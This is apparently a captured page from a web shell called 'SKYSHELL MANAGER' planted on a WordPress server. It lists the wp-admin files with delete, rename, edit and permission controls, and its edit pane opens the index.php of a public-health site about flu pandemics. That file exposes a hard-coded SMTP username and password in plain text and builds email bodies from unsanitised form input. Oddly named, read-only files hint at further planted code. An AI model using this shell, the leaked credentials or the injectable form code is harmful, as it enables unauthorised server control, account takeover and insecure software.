📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="shortcut icon" href="assets/images/favicon.ico" type="image/x-icon"> <link rel="icon" href="assets/images/favicon.ico" type="image/x-icon"> <title>Home - Flu Attack Defender</title> <!-- Bootstrap --> <link href="assets/css/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <link href="assets/css/jquery-ui.css" rel="stylesheet"> <link href="assets/css/animate.css" rel="stylesheet"> <link href="assets/css/owl.carousel.min.css" rel="stylesheet"> <!-- Main css --> <link href="assets/css/main.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <!-- Preloader --> <div class="preloader"> <div class="lds-default"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div><!-- /Preloader --> <!--Header Area--> <header class="header-area fixed-header"> <nav class="navbar navbar-expand-lg main-menu"> <div class="container"> <a class="navbar-brand" href="index.php"><img src="assets/images/logo3.png" class="d-inline-block align-top" alt=""></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="menu-toggle"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav m-auto"> <li class="nav-item active"> <a class="nav-link dropdown-toggle" href="index.php" role="button" data-toggle="dropdown" aria-expanded="false">Home</a> </li> <li class="nav-item"><a class="nav-link" href="about.php">About us</a></li> <li class="nav-item"><a class="nav-link" href="worst-pandemics.php">Worst Pandemics</a></li> <li class="nav-item"><a class="nav-link" href="testing.php">Testing Centers</a></li> <li class="nav-item"><a class="nav-link" href="contact.php">Contact</a></li> </ul> <div class="header-btn justify-content-end"> <a class="bttn-small btn-fill">+800 564 8367</a> </div> </div> </div> </nav> </header><!--/Header Area--> <!--Hero Area--> <section class="hero-section hero-first dark-overlay" style="background: url('assets/images/banners/3.jpg') no-repeat center / cover;"> <div class="hero-area-2"> <div class="single-hero triangle-particle"> <div id="particles-js"></div> <div class="container"> <div class="row"> <div class="col-xl-6 col-lg-6 col-md-12 col-sm-12"> <div class="hero-sub"> <div class="table-cell"> <div class="hero-left"> <!-- <h4>Stay home, stay safe</h4> --> <h1>Medical</h1> <h4>Better health care</h4> <p>The idea that this flu could reach pandemic proportions is a chilling thought.</p> <a href="testing.php" class="bttn-mid btn-fill">Prevention</a> </div> </div> </div> </div> <div class="col-xl-6 col-lg-6 col-md-12 col-sm-12"> <div class="hero-sub"> <div class="table-cell"> <div class="hero-left"> <img src="assets/images/banners/1.png" alt=""> </div> </div> </div> </div> </div> </div> </div> </div> </section><!--/Hero Area--> <!--Symtoms Area--> <section class="section-padding"> <div class="container"> <div class="row"> <div class="col-xl-6 col-lg-6 col-md-6"> <img src="assets/images/banners/public-health.jpg" alt="" style="margin-top:5%"> </div> <div class="col-xl-6 col-lg-6 col-md-6"> <div class="section-title"> <h4>Basic Concept</h4> <h2>What is Public Health?</h2> </div> <div class="about-list"> <p style="line-height:35px;">C.E.A. Winslow, a leading figure in the Public Health movement of the 1920’s, described public health as “the science and art of preventing disease, prolonging life and promoting health through the organized efforts and informed choices of society, organizations, public and private, communities and individuals.” Although breakthroughs in research, technology, globalization, and social awareness have changed the profession significantly since Dr. Winslow’s day, his definition still captures the essence of the “science and art” that is public health.</p> </div> </div> </div> </div> </section><!--/Symtoms Area--> <!--Prevention Area--> <section class="section-padding-3 gray-bg"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-8 centered"> <h4 style="font-size:20px;margin-bottom:20px;color:#0fbcf9">Infectious Diseases</h4> <div class="section-title"> <h2>6 of the Worst Pandemics in History </h2> </div> </div> </div> <div class="row justify-content-center"> <div class="col-xl-3 col-lg-3 col-md-4 col-sm-6"> <div class="single-prevention"> <img src="assets/images/icons/1.png" alt=""><br> <a href="plague.php"><h3>The Great Plague of London</h3></a><br> <p>The bubonic plague technically made its first appearance in pandemic levels in the 14th century</p> <a href="plague.php">+Read More</a> </div> </div> <div class="col-xl-3 col-lg-3 col-md-4 col-sm-6"> <div class="single-prevention"> <img src="assets/images/icons/2.png" alt=""><br> <a href="spanish-flu.php"><h3 style="text-align:left;margin-right:50px;">The Spanish Flu</h3></a><br><br> <p>The Spanish flu was an influenza pandemic that spread around the world between 1918 and 1919, according to the CDC</p> <a href="spanish-flu.php">+Read More</a> </div> </div> <div class="col-xl-3 col-lg-3 col-md-4 col-sm-6"> <div class="single-prevention"> <img src="assets/images/icons/3.png" alt=""><br> <a href="asian-flu.php"><h3 style="text-align:left;margin-right:80px;">Asian Flu</h3></a><br><br> <p>Another flu pandemic, the "Asian Flu" began in East Asia in 1957, according to the CDC.</p> <a href="asian-flu.php">+Read More</a> </div> </div> <div class="col-xl-3 col-lg-3 col-md-4 col-sm-6"> <div class="single-prevention"> <img src="assets/images/icons/4.png" alt=""><br> <a href="pandemic.php"><h3 style="text-align:left;margin-right:30px;">1968 Flu Pandemic</h3></a><br><br> <p>The flu pandemic of 1968—also called the Hong Kong Flu—originated in China in July 1968, according to Encyclopaedia Britannica</p><br> <a href="pandemic.php">+Read More</a> </div> </div> <div class="col-xl-3 col-lg-3 col-md-4 col-sm-6"> <div class="single-prevention"> <img src="assets/images/icons/5.png" alt=""><br> <a href="swine-flu.php"><h3 style="text-align:left;margin-right:80px;">Swine Flu</h3></a><br><br> <p>The most recent flu pandemic in the US, initially known as "swine flu," occurred in 2009 with a novel influenza virus</p><br> <a href="swine-flu.php">+Read More</a> </div> </div> <div class="col-xl-3 col-lg-3 col-md-4 col-sm-6"> <div class="single-prevention"> <img src="assets/images/icons/6.png" alt=""><br> <a href="aids.php"><h3 style="text-align:left;margin-right:80px;">HIV/AIDS</h3></a><br><br> <p>Human immunodeficiency virus (HIV) and acquired immunodeficiency syndrome (AIDS) were first discovered in the early 1980s.</p></br> <a href="aids.php">+Read More</a> </div> </div> </div> </div> </section><!--/Prevention Area--> <!-- How it works Area --> <section class="growth-stat section-padding"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-6 col-lg-6 centered wow fadeInUp" data-wow-delay="0.3s"> <div class="section-title"> <h3 style="color:blue;margin-bottom:15px;">Pandemics</h3> <h2>Risks, Impacts, and Mitigation</h2> </div> </div> </div> <div class="row mb-30"> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 wow fadeInUp" data-wow-delay="0.4s"> <img src="assets/images/products/measuring_risk.png" alt=""> </div> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 wow fadeInUp" data-wow-delay="0.4s"> <div class="growth-content"> <div class="content-grow"> <h3>Risks</h3> <p>Pandemic risk is driven by the combined effects of spark risk (where a pandemic is likely to arise) and spread risk (how likely it is to diffuse broadly through human populations)..</p> <p>Some geographic regions with high spark risk, including Central and West Africa, lag behind the rest of the globe in pandemic preparedness.</p> </div> </div> </div> </div> <div class="row mb-30"> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 order-2 order-xl-1 order-lg-1 order-md-1 order-sm-2 wow fadeInUp" data-wow-delay="0.4s"> <div class="growth-content"> <div class="content-grow"> <h3>Impacts</h3> <p>Pandemics can cause significant, widespread increases in morbidity and mortality and have disproportionately higher mortality impacts on LMICs.</p> <p>Pandemics can cause economic damage through multiple channels, including short-term fiscal shocks and longer-term negative shocks to economic growth.</p> </div> </div> </div> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 order-1 order-xl-2 order-lg-2 order-md-2 order-sm-1 wow fadeInUp" data-wow-delay="0.4s"> <img src="assets/images/products/impacts.jpg" alt=""> </div> </div> <div class="row"> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 wow fadeInUp" data-wow-delay="0.4s"> <img src="assets/images/products/mitigate.jpg" alt="" style="width:75%"> </div> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12 wow fadeInUp" data-wow-delay="0.4s"> <div class="growth-content"> <div class="content-grow"> <h3>Mitigation</h3> <p>Pathogens with pandemic potential vary widely in the resources, capacities, and strategies required for mitigation. However, there are also common prerequisites for effective preparedness and response.</p> <p>Risk transfer mechanisms, such as risk pooling and sovereign-level catastrophe insurance, provide a viable option for managing pandemic risk..</p> </div> </div> </div> </div> </div> </section> <!-- Newslatter --> <section class="section-padding dark-overlay" style="background: url('assets/images/banners/1.jpg') no-repeat fixed;"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-8 centered cl-white"> <div class="section-title mb-20"> <h4>Newsletter</h4> <h2>Stay connected</h2> </div> <div class="newslatter"> <form action="index.php" method="post"> <input type="email" name="email1" placeholder="Enter your email" required> <button type="submit" name="Submit1"><i class="fa fa-angle-right"></i></button> </form> <?php //subscribe form if (isset($_POST['Submit1'])){ $email=$_REQUEST['email1']; if (($email1=="")||($email1=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/fluattackdefender/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@fluattackdefender.com'; $mail->Password = 'j^M4r$V<YdTW_sm('; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@fluattackdefender.com', 'Flu Attack Defender'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@fluattackdefender.com", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Flu Attack Defender [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Flu Attack Defender newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://fluattackdefender.com)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@fluattackdefender.com'; $mail2->Password = 'j^M4r$V<YdTW_sm('; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@fluattackdefender.com', 'Flu Attack Defender'); $mail2->addAddress('contact@fluattackdefender.com', 'Flu Attack Defender'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> </div> </div> </section> <!--Contact Section--> <section class="section-padding-2 gray-bg"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-8 col-lg-8 col-md-12 col-sm-12"> <div class="section-title centered"> <h4>Contact us</h4> <h2>Get in touch</h2> <p>Send us a message if you need any help</p> </div> </div> </div> <div class="row justify-content-center"> <div class="col-xl-6 col-lg-6 col-md-6 col-sm-12"> <div class="contact-form mb-30"> <form action="index.php" method="post"> <div class="row"> <div class="col-xl-6 col-lg-6 col-sm-12"> <input type="text" name="name" placeholder="First Name" required> </div> <div class="col-xl-6 col-lg-6 col-sm-12"> <input type="text" name="lastname" placeholder="Last Name" required> </div> <div class="col-xl-6 col-lg-6 col-sm-12"> <input type="text" name="phone" placeholder="Phone" required> </div> <div class="col-xl-6 col-lg-6 col-sm-12"> <input type="email" name="email" placeholder="Email" required> </div> <div class="col-xl-12 col-lg-12 col-sm-12"> <textarea name="message" rows="4" placeholder="Your message"></textarea> </div> <div class="col-xl-6 col-lg-6 col-sm-12"> <button type="submit" name="Submit" class="bttn-mid btn-fill">Send message</button> </div> </div> </form> <?php //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/fluattackdefender/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@fluattackdefender.com'; $mail->Password = 'j^M4r$V<YdTW_sm('; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@fluattackdefender.com', 'Flu Attack Defender'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@fluattackdefender.com", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Flu Attack Defender [Contact Replay]"; $mail->Body = "<p>This message confirms that you have successfully submitted.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a contact form on (http://fluattackdefender.com)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Mailer Error: "; } else { echo "Success! check your email."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@fluattackdefender.com'; $mail2->Password = 'j^M4r$V<YdTW_sm('; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@fluattackdefender.com', 'Flu Attack Defender'); $mail2->addAddress('contact@fluattackdefender.com', 'Flu Attack Defender'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> </div> </div> </section><!--/Contact Section--> <!--Footer Area--> <footer class="footer-area section-padding black-bg-2"> <div class="container"> <div class="row justify-content-center"> <div class="col-xl-10 col-lg-10 col-md-12 col-sm-12"> <div class="footer-logo centered mb-4"> <img src="assets/images/logo3.png" alt=""> </div> <div class="footer-nav"> <ul> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="un-subscribe.php">Un-Subscribe</a></li> </ul> </div> <div class="copyright"> <p>Copyright © 2020 All Rights Reserved</p> </div> </div> </div> </div> </footer><!--/Footer Area--> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="assets/js/jquery-3.2.1.min.js"></script> <script src="assets/js/jquery-migrate.js"></script> <script src="assets/js/jquery-ui.js"></script> <script src="assets/js/popper.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/owl.carousel.min.js"></script> <script src="assets/js/magnific-popup.min.js"></script> <script src="assets/js/imagesloaded.pkgd.min.js"></script> <script src="assets/js/isotope.pkgd.min.js"></script> <script src="assets/js/waypoints.min.js"></script> <script src="assets/js/jquery.counterup.min.js"></script> <script src="assets/js/wow.min.js"></script> <script src="assets/js/scrollUp.min.js"></script> <script src="assets/js/contact.js"></script> <script src="assets/js/particles.min.js"></script> <script src="assets/js/particle-app.js"></script> <script src="assets/js/script.js"></script> </body> </html>
Save